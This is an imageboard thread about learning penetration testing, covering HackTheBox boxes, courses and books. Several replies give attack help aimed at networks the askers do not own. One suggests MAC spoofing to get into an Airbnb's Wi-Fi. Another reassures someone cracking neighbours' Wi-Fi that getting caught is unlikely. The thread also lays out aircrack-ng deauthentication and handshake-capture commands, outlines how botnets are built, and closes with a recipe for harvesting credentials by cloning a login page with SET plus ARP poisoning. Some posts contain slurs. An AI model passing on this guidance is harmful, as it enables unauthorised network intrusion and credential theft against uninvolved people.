PREVIOUS THREAD HERE I'll try and stay as active as possible in these threads, yeah they don't get much attention but a lot of the posts are interesting and people seem to actually discuss the topics.
Pic related is a huge list of things you can practice on, graciously stolen from
Yeah the two can be linked but I've found that /cyb/+/sec/ typically focussed more on cyberpunk culture as such, from lurking /hmg/ for ages, I've found that this thread gets more technical content and focussed people wanting to learn. Just my two cents though.
Jack Bailey
Alright. Thanks for letting me know. I'll see what I can contribute
Sebastian Watson
>Is this associated with /sec/+/cyb/ by chance? It most certainly is NOT. That clusterfuck of a thread is why the Comptia disclaimer was put in the pasta. Every fucking mouth breather from over there waddled in asking about how they are going to get from sec+ to being like mudge.
Jeremiah Wilson
>mudge lol as if most of those larping zoomers even know who that is
Gabriel Cox
Just completed HTB Jerry, I know its one of the simplest but hey its a start. Metasploit was unable to start a meterpreter shell after payload upload but I figured that out (LHOST related). Onto the next one I guess.
What's a good starting box for beginners? I'm just getting started into CTFs and pentests and I would like to learn more
Aaron Ross
Jerry is the easiest box, I rooted it in under 10 minutes.
Jonathan Green
Nice.
Hudson Hall
What about retired boxes? I like to see how far I can go before having to look up what I have to do
Joshua Green
This course (lectures are open) and book teaches you x86 Assembly and C, plus things like Return-Oriented Programming (ROP) which is what they used for those Spectre attacks recently. cs.cmu.edu/~213/schedule.html
After you can try Radare2 to start reverse engineering shit. See end of this post for Arm exploitation azeria-labs.com/the-importance-of-deep-work-the-30-hour-method-for-learning-a-new-skill/ Personally I don't do many challenges or exercises, just go get bounty's on Hacker One and bug crowd sites. Otherwise there's the book The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws 2nd Edition which is learn by doing, you get Burpsuite up and running and then 'do' the book, you don't read it.
Alexander Butler
Do you have any other bug crowd sites?
Alexander Hill
Here's a big review of the ones I've done. (As far as I recall). these are in the order I did them.
>Blue, famous exploit. Easy. >Mirai, easy user, east but overthinkable root. >Blocky, I don't recall but I think it was easy. >Nibbles, user is easy btu needs guess work. >Shocker, REALLY EASY uses a a now classic exploit. >Bashed, also easy as fuck but it gave me experience with a nice tool. >Solidstate, I think this one involved breaking out of a simple "jail" shell. >Lame, Don't recall. >Legacy, Also don't recall/ >Sense, BSD so it was a little tricky for me. >Chatterbox, sucked massive dicks when it was new and getting hammered. >Valentine, Another famous exploit, don't over think it. >Devel, I don't recall. >Popcorn, another one I CBA. >Mantis, one of the hardest boxes I've done. >Jeeves, annoying but workable. >Node, fun took me a bit to get through all the users to root. >Beep, CBA. >Celestial, really fucking simple deserialization attack. >Poison, another one everyone over thought. >Aragog, took me WAY to long to go from user to root. >Sunday, was super easy when many people were whacking at it. >Olympus, very very CTF like but it was fun the final priv esc is a good technique to learn. >Jerry, Easiest box since Mirai. >Active, One of the most real-world boxes I've done. >Silo, yikes this box kicked my ass until the week it was retired.
Here's my videos if you hit a wall on some of those.
Whoa nice. Have you done the newest retired box yet? I usually watch IppSec, but if you are going to be uploading retired boxes I might watch that. I guess I'll try Blue now. Wish me luck! Any useful advice for doing most of the boxes?
Chase Jenkins
Yeah, that was Celestial I just didn't video it.
My biggest advice is to work the problems as they come, read and digest any errors you get. Also keep good notes, that is my biggest down fall.
Austin Evans
When, if you are, is the Celestial video coming out? Also, I usually keep notes on txt files. Should I put that on my real computer or my virtual machine?
Ian Cooper
How do I get the password for the airbnb I'm at. Niggers wouldn't share it.
Gavin Brown
Scan the network for other devices and steal one of their mac addresses. Ezpz.
Isaac Garcia
What's the command on terminal for scan? Or do you have to download another app?
Once you get the MAC address, then what do you do?
Jordan Hughes
>Just completed HTB Jerry Are you the dude I was talking to last thread? And I said do Jerry, poison and celestial?
Except celestial has been bounced, shame.
Good worn on getting Jerry. It’s a bastard of a box because you never think it’s that simple
Daniel Sanders
how in2 haxoring the android ?
Joseph Clark
>Is it broken or am I not understanding the meme? Yeah it’s broken now. It used to direct straight to that book, but after reading it from end to end, I’ve determined it’s bullshit; a literal fantasy novel written by a someone who wants to play hacker.
One chapter had the author talk about how he climbed over a military base fence, only to have the guards pull rifles on him when he landed on the other side.
During this time where he was sent to some office, he managed to plant a bug in one of the airgapped machines. Literal, fucking, fantasy.
Landon Jenkins
Good thing I didn't waste time on that shit then. Thanks.
Zachary Russell
>Active, One of the most real-world boxes I've done. Oi you.
I need a hand. I’ve got the user password, by running it through gpp decrypt.
pth-winexe, crackmapexe are giving me logon errors.
The forums say that a shell is not required, to im guessing mimikatz isn’t needed.
Where to go from here?
Kevin Reed
>then what do you do? Not be a fucking scrub that’s what.
Joseph Sanchez
Great answer
Caleb Davis
Why don’t you ask an actual question
Andrew Cook
How's it going /hmg/? I'm breaking into this book tonight - finally got myself off WoW long enough to get into it. It's quite motivating that while I'm a pentesting noob, all the shit around it like using Linux and programming I already have down. What's all the other newb hackermen doing to learn? repo.zenk-security.com/Magazine E-book/Penetration Testing - A hands-on introduction to Hacking.pdf
Justin Jones
Doing the bandit challenges and watching retired hacked boxes
Juan Martinez
Those bandit challenges didn't really appeal to me, but I can see how they might be useful for learning bash. Personally I think just straight up running Linux as your main OS does the trick better. What do you mean by retired hacked boxes though?
Jason Rogers
>playing hack the box >running through as many CTF/boot2roots as I can in a month >reading the PWK book from OP links I think I am ready to take the OSCP. If I can bust 10 random, not picked or vetted at all boot2roots by the 30th of September, I’ll book it.
Samuel King
Best of luck with that user. I hope one day to be anywhere close to that level.
To be perfectly honest it probably won't work unless the password sucks. Just changing your MAC address to pretend to be the other supplicant won't work because you don't have the key that was negotiated during the auth 4 way handshake.
Christian Hughes
>Basically he's trying to have you do this. No I wasn’t. I was trying to get him to leave by telling him he was a scrub for asking about shit he could literally google.
Jonathan Campbell
HTB retired boxes. Watch Ippsecc
Aiden Collins
skimming through that prompted me to ask - with a good password list and a GPU at my disposal, how likely do you think I am to access neighboring networks around where I live? I can't imagine residential areas having the strongest passwords. Also another question actually that might be more suited to /cybsec/, I assume there's no 'botnet' related issue with running cracking off of a desktop rather than a live USB right? I mean, unless you get raided and have forensics thrown at you, which is obviously unlikely for small time wifi cracking. Does anyone ever even get caught doing that stuff?
Levi Allen
Just here to remind you that you have no fucking clue about hacking, and you have yet to learn the difference between penetration testing and actual hacking.
These threads, as always, teach normies about normie tools.
Juan Peterson
Then why even make the first responses?
Nolan Brooks
Most of the google results are shit. I was asking for working methods and not just clickbaity articles
Samuel Morris
Oh, this is a pretty cool resource, thanks.
Please detail for us the difference between pentesting and 'actual hacking'
Levi Parker
Then what are non normie tools, or was this post just bait?
Joseph Cruz
Yeah np. It helps to lurk his videos and learn about different methods.
Michael James
People Like you are the worst. Everyone starts out as a script kiddie. No harm in that.
Chase Gomez
This. On the note of script kiddies, are there any other exploit websites like Metasploit?
Jose Kelly
In the life of a pentester how often do you find yourself writing a Python or C script?
Jace Moore
>how likely do you think I am to access neighboring networks around where I live? In all honestly I think I would just search for people still using WEP and use their AP. WEP was so bad that people speculate it was never reviewed by actual professionals. There's probably tons of scripts to let you do that. Also, you can probably find some AP's that never changed their BSSID since that could mean they're using some default password. Past that I don't think you'll get very lucky but haven't really tried myself.
>Also another question actually that might be more suited to /cybsec/, I assume there's no 'botnet' related issue with running cracking off of a desktop rather than a live USB right? I mean, unless you get raided and have forensics thrown at you, which is obviously unlikely for small time wifi cracking. Does anyone ever even get caught doing that stuff? I highly doubt it. Even if you crack someone's WiFi PSK all it gets you is access to their AP. If you crack someone's sent messages you can only see network/transport layer information (IP address, ports, and other bullshit you won't be interested in) if the sites they're accessing have TLS/HTTPS. At best you'll be able to see which porn sites your neighbors visit and that's with a stupid amount of time invested for cracking one session's messages if it's WPA2. So basically you're not really doing anything that damaging. So it's unlikely there's any hidden software that reports you to the cyber police. I don't really do these things so I can't tell you for sure.
Luke Gomez
Nah, just dumb people. The're's a right way and wrong way. The more you people pick the wrong way, the easier it makes black hat penetration possible. I'm not complaining, I'm just amazed.
Matthew Bennett
Is there any good software or terminal commands that help with wifi hacking? Also, realistically, how would you start a botnet?
Adam James
Yea, that makes sense. Obviously I'll be on the look out for WEP but I'm not so optimistic. Anyway, I'm not looking for anything interesting, I more just want to do it for the sake of doing it. It's unlikely I'll go anywhere with it if I do managed to crack something, or that I'll even know where to go.
Samuel Nelson
>implying I did
Too bad so sad. Try harder.
Carter Perry
Then why not help them find the "Right way"? Instead of just telling them to git gud.
Jayden Adams
>exploit websites like Metasploit? It’s not a website...
How do you scan for WEP networks?I’ll check this out
Aaron Wood
Fucking Google It
Jesus Christ cunt.
Kevin Moore
aircrack tools that come with kali are a good start.
Jaxon Thompson
Guys why the fuck isn't reaver or bully working? I'm done pentesting using WPA2 cracking
Lincoln Gonzalez
Look into aircrack, and if you have the money or know where to look on the web I would recommend this course pentesteracademy.com/course?id=9
The man has a bit of an accent but he knows his shit.
Ethan Brown
The whole reason to have threads is to ask questions, you retard. Do you get your jollies by camping out in threads and screeching RTFM?
Colton Gutierrez
>Is there any good software or terminal commands that help with wifi hacking? aircrack-ng is usually the way people capture traffic over the air, run attacks, and attempt to crack weak passwords. Metasploit probably has some attacks against older protocols like WEP or WPA. I don't really execute any attacks. I'm just an engineer that likes to learn how these things work and did a small paper on WiFi security. Just be sure to run these things on your own network.
>Also, realistically, how would you start a botnet? Realistically, a lot of small devices are internet enabled without any concern for security. They're basically easy targets to install malware to open a backdoor for you to control so that's probably the easiest way. The truth is, it's just plain unethical and something a shit skin would do like this dumb ass. nj.com/education/2017/12/rutgers_student_charged_in_series_of_cyber_attacks.html
More generally, people run port scans to find devices that are online. Then run any exploit to open a backdoor if the current OS, service, or firmware has any. Any port scan of the net won't go unnoticed though so some people just use sites that publish results. Maybe they'll get lucky and there's already a script out there or they'll attempt to reverse engineer the firmware. That's why I'm calling the guy above a dumb ass. He was basically just a script kiddie that thought he was being clever.
Well someone did. Either way, I'm sick of people just joining these threads to larp and call anyone that asks beginner questions an idiot. These people are just too new to understand what they're searching for and when I see responses like that it just makes me think you have no clue how to answer them. People ask stupid questions when they're new to things. If you guide them, they'll eventually pick up the language and learn how search things on their own.
Jacob Thomas
Thanks guys. I’ll also check out the course
Noah Bailey
You need a USB wifi dongle that supports packet injection.
Once you get Kali going it would go something like this -
airmon-ng check kill airmon-ng start wlan0mon -M
airodump-ng wlan0
Copy the BSSID and take note of channel #.
airodump-ng –c [channel #] –w [location to save handshake] --bssid [BSSID] wlan0
aireplay-ng -0 0 –a [BSSID] wlan0
Stop both processes once 4-way handshake is found.
Thanks a lot. Any advice for port scans (that google doesn’t tell you)? Thanks and nice dubs
Gavin Morgan
What’s the best dongle for packet injection?
Levi Ward
>Do you get your jollies by camping out in threads and screeching RTFM? I really do, especially when people ask really fucking stupid question.
Austin White
alfa stuff
Ryder Torres
It's illegal in some countries. In fact, just having the software installed without some kind of license can have you fined so do your research. Run scans on your own network and know the difference between a public and private IP. If you're not careful you can end up scanning some military server that logs this stuff.
Samuel Hughes
>If you guide them, they'll eventually pick up the language and learn how search things on their own. Spoon feeding is not guiding. Look at all the questions he’s asked that clearly show he’s done zero research on anything he’s been “guided” to look at.
Jonathan Edwards
I have TL-WN722N and an alfa one both work well.
Jason Mitchell
Any recommendations for port scan software?
Sebastian Cruz
Thanks guys. Really appreciate getting feedback even though I ask really stupid questions. You guys are great
Dylan King
nmap
Cameron Davis
Do you know the specific command?
Wyatt Scott
What kind of basic knowledge should I have before I start trying boxes?
This industry is soul crushing. Save yourself and stay on the black side or you will regret it.
Juan Powell
IPPsec videos. He goes through a bunch of flags I’ve never seen before and am very glad I learnt
Oliver Howard
Please tell me what I spoon fed? Links to resources? Tool suggestions? Vague ideas on how these attacks work? It's easy to get overwhelmed if you don't understand what you're searching for. Like take this question as an example. Sure you can search "port scan software" and find nmap as the first result but they don't know it's any good. Hell, they're still not sure what it does. Is it really spoon feeding to just throw out a tool suggestion so they don't need to blindly sift through results they still don't fully understand yet?
Austin Price
Man what another shit thread. All because of fucking skids.
Jeremiah Lee
Yeah. Meanwhile we could have another meaningful Intel v. AMD discussion.
Jose Bennett
Cracked droopy during work today. Nice and simple, using patterns I have employed time and time again in other CTFs.
My methodology for the first half of the engagement is solid; I have a proven pathway set up that I follow and it almost always leads to a shell.
Sadly I don’t have a solid, proven guide for the second half of the engagement; this seems crucial to passing. But what i did today has worked for others; it’s just slow.
Anyway that’s one done.
Joseph Edwards
stop pissing around and just do the fucking test
Ayden Clark
Whats the best app for android to crack wifi passwords and do mitm attacks? I've tried reaver for cracking but i can't manage to make it work. I've also tried csploit an zANTi but they suck.
Better off buying a laptop and using kali or metasploit.
Blake Stewart
>kali or metasploit. >implying metasoit is an os >implying metasploit has any decent MITM modules >implying metasploit has any wifi modules >implying the one you are about to frantically reply to me about isn’t a post tool for dumping PSKs saves in a box >implying you shouldn’t just crawl back to the cyb thread where you can play pretendsies some more
Just because you couldn’t get either of them working doesn’t mean they suck. You suck, is the problem.
Jaxon Flores
>being this butthurt over a completely reasonable suggestion Jesus Christ you're such a faggot
Logan Ward
I got them to work, but some features like sniffing are impossible to use due to https.The ssl stripping feature simply sucks because of the security pop-ups most browsers have.
Colton Stewart
These threads are so fucking cringey. Its no wonder they normally tag sec with cyber punk. Larping and low IQ posts everywhere. The "lets use premade tools” mentality is a huge red flag.
Ryder Jones
Nothing about your suggestion was reasonable.
What you’ve got working on your phone is about as good as you’re gonna get. SSL stripping really isn’t that viable. Use SET, social engineering toolkit to mimick a page like Facebook or whatever you’re trying to mitm, because I imagine it’s for cred harvesting, do an arp poison to redirect any requests on the network to your fake page, collect everything, off ya go. Even set it so when they click submit it redirects them to the real page so no one gets too suss.
Aiden Cox
everyone knows you're just making multiple posts from the ip count, user